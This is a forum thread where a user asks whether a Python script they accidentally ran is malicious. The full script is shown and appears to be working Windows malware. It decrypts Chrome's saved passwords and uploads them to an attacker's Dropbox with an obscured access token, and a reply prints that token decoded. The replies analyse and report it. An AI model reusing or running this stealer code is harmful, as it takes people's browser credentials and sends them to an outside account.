Python Forum

Python Forum > Python Coding > General Coding Help > Help! I accidentally ran a file without checking the code
Full Version: Help! I accidentally ran a file without checking the code
You're currently viewing a stripped down version of our content. View the full version with proper formatting.

scaryzane

Nov-16-2020, 10:51 PM
So I accidentally ran this file today, and didnt check the python code. Can anybody tell me if this code is malicious?
import os
import json
import base64
import sqlite3
import win32crypt
from Crypto.Cipher import AES
import shutil
import dropbox
from codecs import encode
import getpass


def upload_passfile():
    access_token = encode("pYTjP6sifCxNNNNNNNNNNDIRXrA2kfdgl93KiKK1ddIgXDbvfwWFMmDlTyB1EP0i", 'rot13')
    file_from = "rc.txt"
    file_to = "/passwords/" + str(getpass.getuser()) + "'s_passwords.txt"
    client = dropbox.Dropbox(access_token)
    client.files_upload(open(file_from, "rb").read(), file_to, dropbox.files.WriteMode.overwrite, mute=True)


def get_master_key():
    with open(os.environ['USERPROFILE'] + os.sep + r'AppData\Local\Google\Chrome\User Data\Local State', "r", encoding='utf-8') as f:
        local_state = f.read()
        local_state = json.loads(local_state)
    master_key = base64.b64decode(local_state["os_crypt"]["encrypted_key"])
    master_key = master_key[5:]  # removing DPAPI
    master_key = win32crypt.CryptUnprotectData(master_key, None, None, None, 0)[1] # sqlite3 decryption
    return master_key


def decrypt_payload(cipher, payload):
    return cipher.decrypt(payload)


def generate_cipher(aes_key, iv):
    return AES.new(aes_key, AES.MODE_GCM, iv)


def decrypt_password(buff, master_key):
    try:
        iv = buff[3:15]
        payload = buff[15:]
        cipher = generate_cipher(master_key, iv)
        decrypted_pass = decrypt_payload(cipher, payload)
        decrypted_pass = decrypted_pass[:-16].decode()  # remove suffix bytes
        return decrypted_pass

    except Exception as e:
        decrypted_pass = win32crypt.CryptUnprotectData(buff, None, None, None, 0) #Tuple
        return str(decrypted_pass[1])


if __name__ == '__main__':

    master_key = get_master_key()
    login_db = os.environ['USERPROFILE'] + os.sep + r'AppData\Local\Google\Chrome\User Data\default\Login Data'
    shutil.copy2(login_db, "Loginvault.db") #making a temp copy since Login Data DB is locked while Chrome is running
    conn = sqlite3.connect("Loginvault.db")
    cursor = conn.cursor()

    try:
        cursor.execute("SELECT action_url, username_value, password_value FROM logins")
        passfile = open("rc.txt", "w")
        for r in cursor.fetchall():
            url = r[0]
            username = r[1]
            encrypted_password = r[2]
            decrypted_password = decrypt_password(encrypted_password, master_key)
            passfile.write("URL: " + url + "\nUsername: " + username + "\nPassword: " + decrypted_password + "\n" + "*" * 50 + "\n")
        passfile.close()
        conn.close()

    except Exception as e:
        print(e)

    upload_passfile()
    os.remove("rc.txt")
    os.remove("Loginvault.db")

jefsummers

Nov-16-2020, 11:07 PM
Without deep analysis, this looks like it is trying to obtain your passwords. I would worry, and change all my critical passwords NOW.

iiAsez

Dec-25-2020, 07:51 AM
I had this issue too but after some code analyses I found out that it only retrieves some of your passwords, so I suggest that you change your most important ones, or all of them (recommended).

DeaD_EyE

Dec-25-2020, 02:10 PM
Hm, the hacker should have used Pathlib and his hack works only on Windows.

  1. Getting master key from Chrome
  2. Copy Login Data to another place (Chrome locks the database)
  3. Iterating over the SQL SELECT of logins and password, saving line by line in a text file rc.txt. Using the masterkey to decrpyt.
  4. Sending the rc.txt to a Dropbox account
  5. deleting the rc.txt and the copy of the login database.

One thing is strange. From where comes the module Dropbox?
This hack can only work, if the dropbox dependency is installed in your current Python Interpreter.

PS:
His Dropbox Access Token: cLGwC6fvsPkAAAAAAAAAAQVEKeN2xsqty93XvXX1qqVtKQoisjJSZzQyGlO1RC0v

buran

Dec-25-2020, 05:53 PM
(Dec-25-2020, 02:10 PM)DeaD_EyE Wrote: [ -> ]PS:
His Dropbox Access Token: cLGwC6fvsPkAAAAAAAAAAQVEKeN2xsqty93XvXX1qqVtKQoisjJSZzQyGlO1RC0v
Probably you can report them. It most likely violates Dropbox ToS.

DeaD_EyE

Dec-30-2020, 09:21 AM
They are investigating now but the team is not allowed to visit external urls.
So, I provided them also with source code today.
Python Forum > Python Coding > General Coding Help > Help! I accidentally ran a file without checking the code